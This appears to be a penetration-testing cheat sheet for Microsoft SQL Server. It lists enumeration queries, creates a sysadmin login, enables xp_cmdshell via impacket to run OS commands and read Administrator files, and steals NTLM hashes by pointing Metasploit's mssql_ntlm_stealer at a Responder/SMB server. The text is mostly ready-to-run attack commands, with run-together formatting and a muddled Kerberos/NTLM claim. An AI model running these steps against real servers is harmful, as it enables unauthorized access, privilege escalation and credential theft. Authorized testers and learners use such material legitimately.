# Get all users> SELECT * FROM sys.database_principals# Switch to the database> USE <database># Get databases> SELECT * FROM master.dbo.sysdatabases# List tables> SELECT * FROM information_schema.tables# Get table content> SELECT * FROM <database_name>.dbo.<table_name># Get the version of MSSQL> SELECT @@version# Check if the current user have permission to execute OS command> USE master> EXEC sp_helprotect 'xp_cmdshell'# Get linked servers> EXEC sp_linkedservers> SELECT * FROM sys.servers# Create a new user with sysadmin privilege> CREATE LOGIN tester WITH PASSWORD = 'password'> EXEC sp_addsrvrolemember 'tester', 'sysadmin'# Get current username> SELECT user_name()
Spawn a Windows Command Shell and Run Commands using Impacket
If we connected MSSQL using impacket, we can exeucte the Windows Shell Commands by "enable_xp_cmdshell".
Enable/Disable a Windows Shell
> enable_xp_cmdshell> disable_xp_cmdshell
We can execute commands the same as Windows Command Prompt.
# Get current user> xp_cmdshell whoami# Show files and directories> xp_cmdshell dir> xp_cmdshell dir \Users# Show hidden files> xp_cmdshell dir /a# Get current directory> xp_cmdshell cd# Get contents of file> xp_cmdshell more \Users\Administrator\example.txt> xp_cmdshell type \Users\Administrator\example.txt
MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.
1. Start SMB Server and Responder
First we need to start a SMB server and Responder in each terminal.
# In terminal 1sudoresponder-I<interface># In terminal 2sudoimpacket-smbservershare./-smb2support# In terminal 3msf> useauxiliary/admin/mssql/mssql_ntlm_stealer
2. Execute with Metasploit
In msfconsole, select the following module.
We need to set the “SMBPROXY” option to the Responder IP (this ip is displayed when starting Responder in terminal).
msfconsolemsf> useauxiliary/admin/mssql/mssql_ntlm_stealermsf> setrhosts<target_ip>msf> setusername<username>msf> setpassword<password>msf> setsmbproxy<responder_ip>msf> run
When executing, we can see the NTLM hash in the terminal where SMB server is running.